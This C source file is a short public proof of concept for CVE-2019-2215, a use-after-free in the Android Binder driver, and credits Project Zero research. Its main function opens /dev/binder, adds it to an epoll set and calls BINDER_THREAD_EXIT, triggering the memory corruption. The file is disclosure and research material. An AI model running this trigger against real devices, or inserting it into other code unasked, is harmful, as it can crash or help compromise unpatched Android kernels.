/*++

   ## # # ###     ### ###  #  ###     ### ###  #  ###
  #   # # #         # # # ##  # #       #   # ##  #
  #   # # ##  ### ### # #  #  ### ### ### ###  #  ###
  #   # # #       #   # #  #    #     #   #    #    #
   ##  #  ###     ### ### ### ###     ### ### ### ###
                                         @HackSysTeam

                    CVE-2019-2215
            Android Binder Use after Free
            CloudFuzz TechnoLabs Pvt. Ltd.

 https://groups.google.com/d/msg/syzkaller-bugs/QyXdgUhAF50/g-FXVo1OAwAJ
 https://bugs.chromium.org/p/project-zero/issues/detail?id=1942
 https://googleprojectzero.blogspot.com/2019/11/bad-binder-android-in-wild-exploit.html

 Thanks:
    @maddiestone
    @tehjh

--*/

#include <fcntl.h>
#include <sys/epoll.h>
#include <sys/ioctl.h>
#include <stdio.h>


#define BINDER_THREAD_EXIT 0x40046208ul


int main() {
    int fd, epfd;
    struct epoll_event event = {.events = EPOLLIN};

    fd = open("/dev/binder", O_RDONLY);
    epfd = epoll_create(1000);
    epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event);
    ioctl(fd, BINDER_THREAD_EXIT, NULL);
}
